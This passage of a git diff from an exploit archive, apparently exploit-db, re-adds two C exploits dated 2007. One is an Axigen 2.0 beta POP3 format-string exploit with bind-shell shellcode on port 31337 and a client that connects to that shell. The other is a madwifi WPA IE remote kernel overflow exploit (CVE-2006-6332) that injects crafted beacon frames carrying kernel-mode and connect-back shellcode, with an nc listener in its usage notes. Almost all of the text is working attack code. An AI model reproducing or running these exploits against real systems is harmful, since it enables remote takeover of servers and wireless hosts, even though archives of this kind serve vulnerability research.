<_acceptloop>: - // - - "\x5f" // pop %edi - "\x50" // push %eax - "\x50" // push %eax - "\x57" // push %edi - "\x89\xe1" // mov %esp,%ecx - "\x43" // inc %ebx - "\xb0\x66" // mov $0x66,%al - "\xcd\x80" // int $0x80 - "\x93" // xchg %eax,%ebx - "\xb0\x02" // mov $0x2,%al - "\xcd\x80" // int $0x80 - "\x85\xc0" // test %eax,%eax - "\x75\x1a" // jne <_parent> - "\x59" // pop %ecx - - // - // <_dup2loop>: - // - - "\xb0\x3f" // mov $0x3f,%al - "\xcd\x80" // int $0x80 - "\x49" // dec %ecx - "\x79\xf9" // jns <_dup2loop> - - "\xb0\x0b" // mov $0xb,%al - "\x68\x2f\x2f\x73\x68" // push $0x68732f2f - "\x68\x2f\x62\x69\x6e" // push $0x6e69622f - "\x89\xe3" // mov %esp,%ebx - "\x52" // push %edx - "\x53" // push %ebx - "\xeb\xb2" // jmp <_doint> - - // - // <_parent>: - // - - "\x6a\x06" // push $0x6 - "\x58" // pop %eax - "\xcd\x80" // int $0x80 - "\xb3\x04" // mov $0x4,%bl - "\xeb\xc9" // jmp <_acceptloop> - - // - // 9 write addresses - // - - "\xd8\xbe\x85\x09" // pointer @ 0x0985bed8 - "\xd9\xbe\x85\x09" - "\xda\xbe\x85\x09" - "\xdb\xbe\x85\x09" - "\xe0\xbe\x85\x09" // place shell code @ 0x0985bee0 - "\xe1\xbe\x85\x09" - "\xe2\xbe\x85\x09" - "\xe3\xbe\x85\x09" - "\xe4\xbe\x85\x09" - - // add the format string - - "%18u%66$n%34u%65$hhn%31u%72$hhn%10u%68$hhn%31u%71$hhn%87u%70$hhn%14u%69$hhn%90u%73$hhn%158u%67$hhn\r\n"; - - -static int sock_send (int sock, u_char * src, int len); -static void formatme (u_char * host); -static int sockami (u_char * host, int port); -void shell (int sock); - -void shell (int sock){ /* Attach to Remote Shell */ - - int l; - char buf[512]; - fd_set rfds; - - while (1) { - FD_SET (0, &rfds); - FD_SET (sock, &rfds); - select (sock + 1, &rfds, NULL, NULL, NULL); - if (FD_ISSET (0, &rfds)) { - l = read (0, buf, sizeof (buf)); - if (l <= 0) { - printf("\n - Connection closed by local user\n"); - exit (EXIT_FAILURE); - } - write (sock, buf, l); - } - if (FD_ISSET (sock, &rfds)) { - l = read (sock, buf, sizeof (buf)); - if (l == 0) { - printf ("\n - Connection closed by remote host.\n"); - exit (EXIT_FAILURE); - } else if (l < 0) { - printf ("\n - Read failure\n"); - exit (EXIT_FAILURE); - } - write (1, buf, l); - } - } -} - -static int sock_send (int sock, u_char * src, int len){ /* send data to the open socket */ - - int sbytes; - sbytes = send (sock, src, len, 0); - return (sbytes); -} - -static int sockami (u_char * host, int port){ /* create the socket */ - - struct sockaddr_in address; - struct hostent *hp; - int sock; - - fflush (stdout); - if ((sock = socket (AF_INET, SOCK_STREAM, 0)) == -1){ - perror ("socket()"); - exit (-1); - } - - if ((hp = gethostbyname (host)) == NULL){ - perror ("gethostbyname()"); - exit (-1); - } - - memset (&address, 0, sizeof (address)); - memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length); - address.sin_family = AF_INET; - address.sin_port = htons (port); - - if (connect (sock, (struct sockaddr *) &address, sizeof (address)) == -1){ - perror ("connect()"); - exit (EXIT_FAILURE); - } - return (sock); -} - -static void formatme (u_char * host){ /* do the evil */ - - int sock; - printf ("+Connecting to %s:%d ", host, PORT_POP3); - sock = sockami (host, PORT_POP3); - printf ("\n+Sending format string\n"); - sock_send (sock, formatString, strlen (formatString)); - fflush (stdout); - sleep(2); - printf ("+Connecting to Shell "); - sock = sockami (host, 31337); - printf ("- Done\n"); - shell(sock); - -} - -int main (int argc, char **argv){ /* go figure */ - - printf ("Axigen 2.0 beta Remote pop3 exploit\n" - "by: \n\n"); - - if (argc <= 1) - { - fprintf (stderr, "Usage: %s \n\n", argv[0]); - exit (EXIT_SUCCESS); - } - - formatme (argv[1]); -} - -// milw0rm.com [2007-02-18] +/* axiagen.c + * + * Axigen eMail Server v2.0 (beta) + * by fuGich Tue Dec 5 2006 + * + * thanks to mu-b + * + * - Tested on: Axigen V2 (beta) + * + * logType for the pop3 service must be "system" and + * the logLevel set to any number with 4th bit set + * + * remote shell format string vulnerability in pop3 + * /bin/sh to bind to port 31337 + * + * optimised format string generated with libforSC + * used hhn for writes, could have been hn's but this was small enough and reduces size of log entry generated + * + */ + +#include +#include +#include +#include +#include + + +#define DEF_PORT 110 +#define PORT_POP3 DEF_PORT + + +char formatString[] = + + // plt fixup code + + "\xba\xd8\xbe\x85\x09" // mov $0x985bed8,%edx + "\xc7\x02\x9a\xf0\x04\x08" // movl $0x804f09a,(%edx) + "\x8d\x52\x04" // lea 0x4(%edx),%edx + "\xc6\x02\xaa" // movb $0xaa,(%edx) + "\x90\x90\x90" // make divisible by 8 + + // + // bind shell with fork to port 31337 98 bytes + // + + "\x6a\x66" // push $0x66 + "\x58" // pop %eax + "\x99" // cltd + "\x6a\x01" // push $0x1 + "\x5b" // pop %ebx + "\x52" // push %edx + "\x53" // push %ebx + "\x6a\x02" // push $0x2 + + // + // <_doint>: + // + + "\x89\xe1" // mov %esp,%ecx + "\xcd\x80" // int $0x80 + + "\x5b" // pop %ebx + "\x5d" // pop %ebp + "\x52" // push %edx + "\x66\xbd\x69\x7a" // mov $0x7a69,%bp (0x7a69 = 31337) + "\x0f\xcd" // bswap %ebp + "\x09\xdd" // or %ebx,%ebp + "\x55" // push %ebp + "\x6a\x10" // push $0x10 + "\x51" // push %ecx + "\x50" // push %eax + "\x89\xe1" // mov %esp,%ecx + "\xb0\x66" // mov $0x66,%al + "\xcd\x80" // int $0x80 + "\xb3\x04" // mov $0x4,%bl + "\xb0\x66" // mov $0x66,%al + "\xcd\x80" // int $0x80 + + // + // <_acceptloop>: + // + + "\x5f" // pop %edi + "\x50" // push %eax + "\x50" // push %eax + "\x57" // push %edi + "\x89\xe1" // mov %esp,%ecx + "\x43" // inc %ebx + "\xb0\x66" // mov $0x66,%al + "\xcd\x80" // int $0x80 + "\x93" // xchg %eax,%ebx + "\xb0\x02" // mov $0x2,%al + "\xcd\x80" // int $0x80 + "\x85\xc0" // test %eax,%eax + "\x75\x1a" // jne <_parent> + "\x59" // pop %ecx + + // + // <_dup2loop>: + // + + "\xb0\x3f" // mov $0x3f,%al + "\xcd\x80" // int $0x80 + "\x49" // dec %ecx + "\x79\xf9" // jns <_dup2loop> + + "\xb0\x0b" // mov $0xb,%al + "\x68\x2f\x2f\x73\x68" // push $0x68732f2f + "\x68\x2f\x62\x69\x6e" // push $0x6e69622f + "\x89\xe3" // mov %esp,%ebx + "\x52" // push %edx + "\x53" // push %ebx + "\xeb\xb2" // jmp <_doint> + + // + // <_parent>: + // + + "\x6a\x06" // push $0x6 + "\x58" // pop %eax + "\xcd\x80" // int $0x80 + "\xb3\x04" // mov $0x4,%bl + "\xeb\xc9" // jmp <_acceptloop> + + // + // 9 write addresses + // + + "\xd8\xbe\x85\x09" // pointer @ 0x0985bed8 + "\xd9\xbe\x85\x09" + "\xda\xbe\x85\x09" + "\xdb\xbe\x85\x09" + "\xe0\xbe\x85\x09" // place shell code @ 0x0985bee0 + "\xe1\xbe\x85\x09" + "\xe2\xbe\x85\x09" + "\xe3\xbe\x85\x09" + "\xe4\xbe\x85\x09" + + // add the format string + + "%18u%66$n%34u%65$hhn%31u%72$hhn%10u%68$hhn%31u%71$hhn%87u%70$hhn%14u%69$hhn%90u%73$hhn%158u%67$hhn\r\n"; + + +static int sock_send (int sock, u_char * src, int len); +static void formatme (u_char * host); +static int sockami (u_char * host, int port); +void shell (int sock); + +void shell (int sock){ /* Attach to Remote Shell */ + + int l; + char buf[512]; + fd_set rfds; + + while (1) { + FD_SET (0, &rfds); + FD_SET (sock, &rfds); + select (sock + 1, &rfds, NULL, NULL, NULL); + if (FD_ISSET (0, &rfds)) { + l = read (0, buf, sizeof (buf)); + if (l <= 0) { + printf("\n - Connection closed by local user\n"); + exit (EXIT_FAILURE); + } + write (sock, buf, l); + } + if (FD_ISSET (sock, &rfds)) { + l = read (sock, buf, sizeof (buf)); + if (l == 0) { + printf ("\n - Connection closed by remote host.\n"); + exit (EXIT_FAILURE); + } else if (l < 0) { + printf ("\n - Read failure\n"); + exit (EXIT_FAILURE); + } + write (1, buf, l); + } + } +} + +static int sock_send (int sock, u_char * src, int len){ /* send data to the open socket */ + + int sbytes; + sbytes = send (sock, src, len, 0); + return (sbytes); +} + +static int sockami (u_char * host, int port){ /* create the socket */ + + struct sockaddr_in address; + struct hostent *hp; + int sock; + + fflush (stdout); + if ((sock = socket (AF_INET, SOCK_STREAM, 0)) == -1){ + perror ("socket()"); + exit (-1); + } + + if ((hp = gethostbyname (host)) == NULL){ + perror ("gethostbyname()"); + exit (-1); + } + + memset (&address, 0, sizeof (address)); + memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length); + address.sin_family = AF_INET; + address.sin_port = htons (port); + + if (connect (sock, (struct sockaddr *) &address, sizeof (address)) == -1){ + perror ("connect()"); + exit (EXIT_FAILURE); + } + return (sock); +} + +static void formatme (u_char * host){ /* do the evil */ + + int sock; + printf ("+Connecting to %s:%d ", host, PORT_POP3); + sock = sockami (host, PORT_POP3); + printf ("\n+Sending format string\n"); + sock_send (sock, formatString, strlen (formatString)); + fflush (stdout); + sleep(2); + printf ("+Connecting to Shell "); + sock = sockami (host, 31337); + printf ("- Done\n"); + shell(sock); + +} + +int main (int argc, char **argv){ /* go figure */ + + printf ("Axigen 2.0 beta Remote pop3 exploit\n" + "by: \n\n"); + + if (argc <= 1) + { + fprintf (stderr, "Usage: %s \n\n", argv[0]); + exit (EXIT_SUCCESS); + } + + formatme (argv[1]); +} + +// milw0rm.com [2007-02-18] diff --git a/platforms/linux/remote/3389.c b/platforms/linux/remote/3389.c index 8739411a0..c3bcb6310 100755 --- a/platforms/linux/remote/3389.c +++ b/platforms/linux/remote/3389.c @@ -1,387 +1,387 @@ -/* ---- madwifi WPA/RSN IE remote kernel buffer overflow ------ - * expoit code by: sgrakkyu antifork.org -- 10/1/2007 - * - * CVE: 2006-6332 (Laurent BUTTI, Jerome RAZNIEWSKI, Julien TINNES) - * - * (for wpa) - * .... - * memcpy(buf, se->se_wpa_ie, se->se_wpa_ie[1] + 2) - * .... - * .... - * the function re-uses args in the stack before returning so we - * can't trash them overwriting. - * Different compiled module [ex. different version of gcc] may require - * a different pad value.. (see -g option) - * - * ex: - * on one terminal runs: nc -l -p 31337 - * phi:~/kexec/lorcon# gcc -g -o madwifi_exp madwifi_exp.c -lorcon - * phi:~/kexec/lorcon# wlanconfig ath1 create wlandev wifi0 wlanmode monitor - * phi:~/kexec/lorcon# ifconfig ath1 up - * phi:~/kexec/lorcon# ./madwifi_exp -i ath1 -d madwifing -a 10.0.0.1 -p 31337 - * [opt-ip]: 10.0.0.1 - * [opt-port]: 31337 - * [opt-iface]: ath1 - * [opt-driver]: madwifing - * [opt-jump]: 0xffffe777 - * [pad]: 36 - * - * [*][Low Avail Byte]: 103 - * [*][High Avail Byte]: 47 - * [*][u_code[] (high)size]: 91, [ring0_code[] (low)size]: 47 - * [*][ patching jump ]: [eba7] - * [*][Payload space]: 192 - * [*][beacon_frame-80211]=54 - * [*][beacon_WPA_IE_lenght]: 198 - * - * [printing frame - start] - * 80 00 00 00 ff ff ff ff ff ff cc cc cc cc cc cc - * cc cc cc cc cc cc 00 00 00 00 00 00 00 00 00 00 - * 64 00 01 00 00 03 41 41 41 01 08 82 84 8b 96 0c - * 18 30 48 03 01 0b dd c6 00 50 f2 01 01 00 90 90 - * 90 90 90 90 90 90 90 90 90 90 31 c0 89 c3 40 40 - * .... - * .... - * - * - * Tuning option: - * - depending on gcc version/optimization we have to change the padding of vector - * payload, take a look to the following disassembly of the module wlan.o compiled - * with gcc-4.0 (kernel compiled for i586): - * - * 00015a49 : - * 15a49: 55 push %ebp - * 15a4a: 57 push %edi - * 15a4b: 56 push %esi - * 15a4c: 53 push %ebx - * 15a4d: 81 ec c4 00 00 00 sub $0xbc,%esp <--16+188=[204] - * ......... - * ......... - * ......... - * 15fc3: 8d 54 24 12 lea 0xa(%esp),%edx <-esp+[10] - * 15fc7: 89 d7 mov %edx,%edi - * ... - * ... - * 15fd5: f3 a5 rep movsl %ds:(%esi),%es:(%edi) - * - * - * this is not a rule, check gcc generated code to calculate correct pad value : - * [startbuf-ret] = (16 + 188 - 10) = 194 byte - * PAD = 194 - SHELLCODE_SPACE - IEWPAheader(code,len,oui) = 194 - 150 - 8 = 36 - * ( -g 36 would be the choice in that case) - * - * NOTE: 1) the remote box must call the ioctl() SIOCGIWSCAN - * for ex. when the iface gets up or during iwlist iface scanning - * command - * - * 2) if you need more space for kernel mode code you can rely on - * struct ieee80211_scan_entry paramter of gwiscan_cb() - * function to access the real frame (a trivial joke) - * - * 3) i had no time to test this exploit on other boxes..: - * tested only on: Slackware 10 - madwifi 0.9.2 - * Kubuntu - kernel 2.6.17 - madwifi 0.9.2 - * - * - * TNX TNX TNX twiz antifork.org - */ - - -#include -#include -#include -#include -#include -#include - -#include -#include -#include -#include - - -/* 2.6.17 VSYSCALL: for >= 2.6.18 without fixed-vsyscall entry use kernel hardcoded value */ -#define VSYSCALL_JMP_ESP_OFFSET 0xffffe777 -#define IE_ZERO 0x00000000 - -#define FIX_BYTE(base,offset,byte) *(((unsigned char*)base) + offset) = byte; -#define FIX_WORD(base,offset,word) *((unsigned short *)((unsigned char*)base + offset)) = word; -#define FIX_DWORD(base,offset,dword) *((unsigned int *)((unsigned char*)base + offset)) = dword; - -/* shellcode max buffer */ -/* 8 bytes used for lenght + oui */ -#define SHELLCODE_SPACE 150 -#define PAD_SPACE 36 - -#define PAYLOAD_SPACE (SHELLCODE_SPACE + pad_space + 4 + 2) -#define TOTAL_PACKET_LEN (sizeof(beacon_80211_wpa) -1 + PAYLOAD_SPACE) - -/* exp option */ -char *iface = NULL; /* needed */ -char *driver = NULL; /* needed */ -char *ip = NULL; /* needed */ -short port = 0; /* needed */ -unsigned int jmp_address = VSYSCALL_JMP_ESP_OFFSET; -unsigned int pad_space = PAD_SPACE; - - - -/* ----------------------------------- */ - -#define SUB_OFFSET_PATCH 8 -char ring0_code[]= - "\xe8\x00\x00\x00\x00" //call 8048359 - "\x5e" //pop %esi - "\x81\xee\x88\x00\x00\x00" //sub $0x88,%esi /* PATCH */ - "\x31\xc0" //xor %eax,%eax - "\xb0\x04" //mov $0x4,%al - "\x01\xc4" //add %eax,%esp - "\x83\x3c\x24\x73" //cmp $0x73,%esp - "\x75\xf8" //jne 8048364 - "\x83\x7c\x24\x0c\x7b" //cmpl $0x7b,0xc(%esp) - "\x75\xf1" //jne 8048364 - "\x29\xc4" //sub %eax,%esp - "\x8b\x7c\x24\x0c" //mov 0xc(%esp),%edi - "\x89\x3c\x24" //mov %edi,(%esp) - "\x31\xc9" //xor %ecx,%ecx - "\xb1\x5b" //mov $0x5b,%cl /* FIX */ - "\xf3\xa4" //rep movsb %ds:(%esi),%es:(%edi) - "\xcf"; //iret - - -/* connect back */ -#define IP_OFFSET 35 -#define PORT_OFFSET 44 -char u_code[] = -"\x31\xc0\x89\xc3\x40\x40\xcd\x80\x39\xc3\x74\x03\x31\xc0\x40\xcd\x80" /* fork */ -"\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02\x89\xe1\xcd\x80\x5b\x5d" -"\xbe" -"\xf5\xff\xff\xfe" // ~ip -"\xf7\xd6\x56\x66\xbd" -"\x69\x7a" // port -"\x0f\xcd\x09\xdd\x55\x43\x6a\x10\x51\x50\xb0\x66\x89\xe1\xcd\x80\x87\xd9" -"\x5b\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f\x73\x68" -"\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\xeb\xdf"; - - -/* 802.11header + WPA IE prolog */ -#define WPA_LEN_OFFSET 55 -#define CHANNEL 11 -char beacon_80211_wpa[] = -"\x80" // management frame / subtype beacon -"\x00" // flags -"\x00\x00" // duration -"\xFF\xFF\xFF\xFF\xFF\xFF" // destination addr -"\xCC\xCC\xCC\xCC\xCC\xCC" // src address -"\xCC\xCC\xCC\xCC\xCC\xCC" // bbsid -"\x00\x00" // seq -"\x00\x00\x00\x00\x00\x00\x00\x00" // timestamp -"\x64\x00" // interval -"\x01\x00" // caps -"\x00\x03\x41\x41\x41" // ssid Information Element -"\x01\x08\x82\x84\x8b\x96\x0c\x18\x30\x48" // rates Information Element -"\x03\x01\x0B" // channel Information Element (11) -"\xdd\xc6" // WPA Information Element (priv ID + len) (0xc6 = 0xc0 + 6) /* PATCH */ -"\x00\x50\xf2\x01\x01\x00"; // oui + type + version (first 6 byte of len) - -#define JUMP_OFFSET_PATCH 1 -char jmp_back[]="\xeb\x00"; - -/* ----------------------------------- */ - - -void usage(char *prog) -{ - printf("[usage]: %s (-i iface) (-d drivername) (-a ip) (-p port) [-g pad] [-j jump_address]\n", prog); -} - -unsigned char *build_frame() -{ - int i,j; - char *frame = malloc(TOTAL_PACKET_LEN); - char *ptr = frame; - - unsigned int hsb = sizeof(ring0_code)-1; - unsigned int lsb = SHELLCODE_SPACE - hsb; - printf("[*][low-kcode]: %d\n[*][high-ucode]: %d\n", - lsb, hsb); - - printf("[*][u_code[] (high)size]: %d, [ring0_code[] (low)size]: %d\n", - sizeof(u_code)-1, sizeof(ring0_code)-1); - - /* fix jump */ - int b = -4 - pad_space - (sizeof(jmp_back)-1) - (sizeof(ring0_code)-1); - FIX_BYTE(jmp_back, JUMP_OFFSET_PATCH, b); - - /* fix ring0_code/u_code displacement */ - unsigned int sub = 5 + (sizeof(u_code)-1); - FIX_BYTE(ring0_code, SUB_OFFSET_PATCH, sub); - - printf("[*][payload space]: %d\n", PAYLOAD_SPACE); - - /* fix beacon_80211_wpa: WPA len */ - FIX_BYTE(beacon_80211_wpa, WPA_LEN_OFFSET, PAYLOAD_SPACE + 6); - printf("[*][beacon_WPA_IE_lenght]: %u\n", - (unsigned char)beacon_80211_wpa[WPA_LEN_OFFSET]); - - /* fill frame */ - memset(frame, 0x00, TOTAL_PACKET_LEN); - - memcpy(ptr, beacon_80211_wpa, sizeof(beacon_80211_wpa)-1); - ptr += (sizeof(beacon_80211_wpa)-1); - - memset(ptr, 0x90, lsb - (sizeof(u_code)-1)); - ptr += (lsb - (sizeof(u_code)-1)); - - memcpy(ptr, u_code, sizeof(u_code) -1); - ptr += (sizeof(u_code) -1); - - memcpy(ptr, ring0_code, sizeof(ring0_code)-1); - ptr += sizeof(ring0_code)-1; - - for(i=0; i antifork.org\n" - "-------------------- **** ------------------\n" - "[opt-ip]: %s\n[opt-port]: %d\n[opt-iface]: %s\n[opt-driver]: %s\n[opt-jump]: 0x%08x\n[pad]: %d\n" - "-------------------- **** ------------------\n\n", - ip, port, iface, driver, jmp_address, pad_space); - - unsigned char *frame = build_frame(); - print_frame(frame, TOTAL_PACKET_LEN); - - /* Use the command-line argument as the desired driver type */ - drivertype = tx80211_resolvecard(driver); - - /* Validate the driver name specified */ - if (drivertype == INJ_NODRIVER) - { - fprintf(stderr, "Driver name not recognized.\n"); - return -1; - } - - if (tx80211_init(&in_tx, iface, drivertype) < 0) { - fprintf(stderr, "Error initializing drive \"%s\".\n", argv[1]); - return -1; - } - - if ((tx80211_getcapabilities(&in_tx) & TX80211_CAP_CTRL) == 0) - { - fprintf(stderr, "Driver does not support transmitting control frames.\n"); - return -1; - } - - if (tx80211_setchannel(&in_tx, CHANNEL) < 0) - { - fprintf(stderr, "Error setting channel.\n"); - return 1; - } - - if (tx80211_open(&in_tx) < 0) - { - fprintf(stderr, "Unable to open interface %s.\n", in_tx.ifname); - return 1; - } - - /* Initialized in_packet with packet contents and length of the packet */ - in_packet.packet = frame; - in_packet.plen = TOTAL_PACKET_LEN; - - printf("[sending packets]: about 10 a second\n"); - - while(i < 10000) - { - /* Transmit the packet */ - if (tx80211_txpacket(&in_tx, &in_packet) < 0) - { - fprintf(stderr, "Unable to transmit packet.\n"); - perror("txpacket"); - return 1; - } - i++; - usleep(100000); - } - /* Close the socket after transmitting the packet */ - tx80211_close(&in_tx); - - return 0; -} - -// milw0rm.com [2007-03-01] +/* ---- madwifi WPA/RSN IE remote kernel buffer overflow ------ + * expoit code by: sgrakkyu antifork.org -- 10/1/2007 + * + * CVE: 2006-6332 (Laurent BUTTI, Jerome RAZNIEWSKI, Julien TINNES) + * + * (for wpa) + * .... + * memcpy(buf, se->se_wpa_ie, se->se_wpa_ie[1] + 2) + * .... + * .... + * the function re-uses args in the stack before returning so we + * can't trash them overwriting. + * Different compiled module [ex. different version of gcc] may require + * a different pad value.. (see -g option) + * + * ex: + * on one terminal runs: nc -l -p 31337 + * phi:~/kexec/lorcon# gcc -g -o madwifi_exp madwifi_exp.c -lorcon + * phi:~/kexec/lorcon# wlanconfig ath1 create wlandev wifi0 wlanmode monitor + * phi:~/kexec/lorcon# ifconfig ath1 up + * phi:~/kexec/lorcon# ./madwifi_exp -i ath1 -d madwifing -a 10.0.0.1 -p 31337 + * [opt-ip]: 10.0.0.1 + * [opt-port]: 31337 + * [opt-iface]: ath1 + * [opt-driver]: madwifing + * [opt-jump]: 0xffffe777 + * [pad]: 36 + * + * [*][Low Avail Byte]: 103 + * [*][High Avail Byte]: 47 + * [*][u_code[] (high)size]: 91, [ring0_code[] (low)size]: 47 + * [*][ patching jump ]: [eba7] + * [*][Payload space]: 192 + * [*][beacon_frame-80211]=54 + * [*][beacon_WPA_IE_lenght]: 198 + * + * [printing frame - start] + * 80 00 00 00 ff ff ff ff ff ff cc cc cc cc cc cc + * cc cc cc cc cc cc 00 00 00 00 00 00 00 00 00 00 + * 64 00 01 00 00 03 41 41 41 01 08 82 84 8b 96 0c + * 18 30 48 03 01 0b dd c6 00 50 f2 01 01 00 90 90 + * 90 90 90 90 90 90 90 90 90 90 31 c0 89 c3 40 40 + * .... + * .... + * + * + * Tuning option: + * - depending on gcc version/optimization we have to change the padding of vector + * payload, take a look to the following disassembly of the module wlan.o compiled + * with gcc-4.0 (kernel compiled for i586): + * + * 00015a49 : + * 15a49: 55 push %ebp + * 15a4a: 57 push %edi + * 15a4b: 56 push %esi + * 15a4c: 53 push %ebx + * 15a4d: 81 ec c4 00 00 00 sub $0xbc,%esp <--16+188=[204] + * ......... + * ......... + * ......... + * 15fc3: 8d 54 24 12 lea 0xa(%esp),%edx <-esp+[10] + * 15fc7: 89 d7 mov %edx,%edi + * ... + * ... + * 15fd5: f3 a5 rep movsl %ds:(%esi),%es:(%edi) + * + * + * this is not a rule, check gcc generated code to calculate correct pad value : + * [startbuf-ret] = (16 + 188 - 10) = 194 byte + * PAD = 194 - SHELLCODE_SPACE - IEWPAheader(code,len,oui) = 194 - 150 - 8 = 36 + * ( -g 36 would be the choice in that case) + * + * NOTE: 1) the remote box must call the ioctl() SIOCGIWSCAN + * for ex. when the iface gets up or during iwlist iface scanning + * command + * + * 2) if you need more space for kernel mode code you can rely on + * struct ieee80211_scan_entry paramter of gwiscan_cb() + * function to access the real frame (a trivial joke) + * + * 3) i had no time to test this exploit on other boxes..: + * tested only on: Slackware 10 - madwifi 0.9.2 + * Kubuntu - kernel 2.6.17 - madwifi 0.9.2 + * + * + * TNX TNX TNX twiz antifork.org + */ + + +#include +#include +#include +#include +#include +#include + +#include +#include +#include +#include + + +/* 2.6.17 VSYSCALL: for >= 2.6.18 without fixed-vsyscall entry use kernel hardcoded value */ +#define VSYSCALL_JMP_ESP_OFFSET 0xffffe777 +#define IE_ZERO 0x00000000 + +#define FIX_BYTE(base,offset,byte) *(((unsigned char*)base) + offset) = byte; +#define FIX_WORD(base,offset,word) *((unsigned short *)((unsigned char*)base + offset)) = word; +#define FIX_DWORD(base,offset,dword) *((unsigned int *)((unsigned char*)base + offset)) = dword; + +/* shellcode max buffer */ +/* 8 bytes used for lenght + oui */ +#define SHELLCODE_SPACE 150 +#define PAD_SPACE 36 + +#define PAYLOAD_SPACE (SHELLCODE_SPACE + pad_space + 4 + 2) +#define TOTAL_PACKET_LEN (sizeof(beacon_80211_wpa) -1 + PAYLOAD_SPACE) + +/* exp option */ +char *iface = NULL; /* needed */ +char *driver = NULL; /* needed */ +char *ip = NULL; /* needed */ +short port = 0; /* needed */ +unsigned int jmp_address = VSYSCALL_JMP_ESP_OFFSET; +unsigned int pad_space = PAD_SPACE; + + + +/* ----------------------------------- */ + +#define SUB_OFFSET_PATCH 8 +char ring0_code[]= + "\xe8\x00\x00\x00\x00" //call 8048359 + "\x5e" //pop %esi + "\x81\xee\x88\x00\x00\x00" //sub $0x88,%esi /* PATCH */ + "\x31\xc0" //xor %eax,%eax + "\xb0\x04" //mov $0x4,%al + "\x01\xc4" //add %eax,%esp + "\x83\x3c\x24\x73" //cmp $0x73,%esp + "\x75\xf8" //jne 8048364 + "\x83\x7c\x24\x0c\x7b" //cmpl $0x7b,0xc(%esp) + "\x75\xf1" //jne 8048364 + "\x29\xc4" //sub %eax,%esp + "\x8b\x7c\x24\x0c" //mov 0xc(%esp),%edi + "\x89\x3c\x24" //mov %edi,(%esp) + "\x31\xc9" //xor %ecx,%ecx + "\xb1\x5b" //mov $0x5b,%cl /* FIX */ + "\xf3\xa4" //rep movsb %ds:(%esi),%es:(%edi) + "\xcf"; //iret + + +/* connect back */ +#define IP_OFFSET 35 +#define PORT_OFFSET 44 +char u_code[] = +"\x31\xc0\x89\xc3\x40\x40\xcd\x80\x39\xc3\x74\x03\x31\xc0\x40\xcd\x80" /* fork */ +"\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02\x89\xe1\xcd\x80\x5b\x5d" +"\xbe" +"\xf5\xff\xff\xfe" // ~ip +"\xf7\xd6\x56\x66\xbd" +"\x69\x7a" // port +"\x0f\xcd\x09\xdd\x55\x43\x6a\x10\x51\x50\xb0\x66\x89\xe1\xcd\x80\x87\xd9" +"\x5b\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f\x73\x68" +"\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\xeb\xdf"; + + +/* 802.11header + WPA IE prolog */ +#define WPA_LEN_OFFSET 55 +#define CHANNEL 11 +char beacon_80211_wpa[] = +"\x80" // management frame / subtype beacon +"\x00" // flags +"\x00\x00" // duration +"\xFF\xFF\xFF\xFF\xFF\xFF" // destination addr +"\xCC\xCC\xCC\xCC\xCC\xCC" // src address +"\xCC\xCC\xCC\xCC\xCC\xCC" // bbsid +"\x00\x00" // seq +"\x00\x00\x00\x00\x00\x00\x00\x00" // timestamp +"\x64\x00" // interval +"\x01\x00" // caps +"\x00\x03\x41\x41\x41" // ssid Information Element +"\x01\x08\x82\x84\x8b\x96\x0c\x18\x30\x48" // rates Information Element +"\x03\x01\x0B" // channel Information Element (11) +"\xdd\xc6" // WPA Information Element (priv ID + len) (0xc6 = 0xc0 + 6) /* PATCH */ +"\x00\x50\xf2\x01\x01\x00"; // oui + type + version (first 6 byte of len) + +#define JUMP_OFFSET_PATCH 1 +char jmp_back[]="\xeb\x00"; + +/* ----------------------------------- */ + + +void usage(char *prog) +{ + printf("[usage]: %s (-i iface) (-d drivername) (-a ip) (-p port) [-g pad] [-j jump_address]\n", prog); +} + +unsigned char *build_frame() +{ + int i,j; + char *frame = malloc(TOTAL_PACKET_LEN); + char *ptr = frame; + + unsigned int hsb = sizeof(ring0_code)-1; + unsigned int lsb = SHELLCODE_SPACE - hsb; + printf("[*][low-kcode]: %d\n[*][high-ucode]: %d\n", + lsb, hsb); + + printf("[*][u_code[] (high)size]: %d, [ring0_code[] (low)size]: %d\n", + sizeof(u_code)-1, sizeof(ring0_code)-1); + + /* fix jump */ + int b = -4 - pad_space - (sizeof(jmp_back)-1) - (sizeof(ring0_code)-1); + FIX_BYTE(jmp_back, JUMP_OFFSET_PATCH, b); + + /* fix ring0_code/u_code displacement */ + unsigned int sub = 5 + (sizeof(u_code)-1); + FIX_BYTE(ring0_code, SUB_OFFSET_PATCH, sub); + + printf("[*][payload space]: %d\n", PAYLOAD_SPACE); + + /* fix beacon_80211_wpa: WPA len */ + FIX_BYTE(beacon_80211_wpa, WPA_LEN_OFFSET, PAYLOAD_SPACE + 6); + printf("[*][beacon_WPA_IE_lenght]: %u\n", + (unsigned char)beacon_80211_wpa[WPA_LEN_OFFSET]); + + /* fill frame */ + memset(frame, 0x00, TOTAL_PACKET_LEN); + + memcpy(ptr, beacon_80211_wpa, sizeof(beacon_80211_wpa)-1); + ptr += (sizeof(beacon_80211_wpa)-1); + + memset(ptr, 0x90, lsb - (sizeof(u_code)-1)); + ptr += (lsb - (sizeof(u_code)-1)); + + memcpy(ptr, u_code, sizeof(u_code) -1); + ptr += (sizeof(u_code) -1); + + memcpy(ptr, ring0_code, sizeof(ring0_code)-1); + ptr += sizeof(ring0_code)-1; + + for(i=0; i antifork.org\n" + "-------------------- **** ------------------\n" + "[opt-ip]: %s\n[opt-port]: %d\n[opt-iface]: %s\n[opt-driver]: %s\n[opt-jump]: 0x%08x\n[pad]: %d\n" + "-------------------- **** ------------------\n\n", + ip, port, iface, driver, jmp_address, pad_space); + + unsigned char *frame = build_frame(); + print_frame(frame, TOTAL_PACKET_LEN); + + /* Use the command-line argument as the desired driver type */ + drivertype = tx80211_resolvecard(driver); + + /* Validate the driver name specified */ + if (drivertype == INJ_NODRIVER) + { + fprintf(stderr, "Driver name not recognized.\n"); + return -1; + } + + if (tx80211_init(&in_tx, iface, drivertype) < 0) { + fprintf(stderr, "Error initializing drive \"%s\".\n", argv[1]); + return -1; + } + + if ((tx80211_getcapabilities(&in_tx) & TX80211_CAP_CTRL) == 0) + { + fprintf(stderr, "Driver 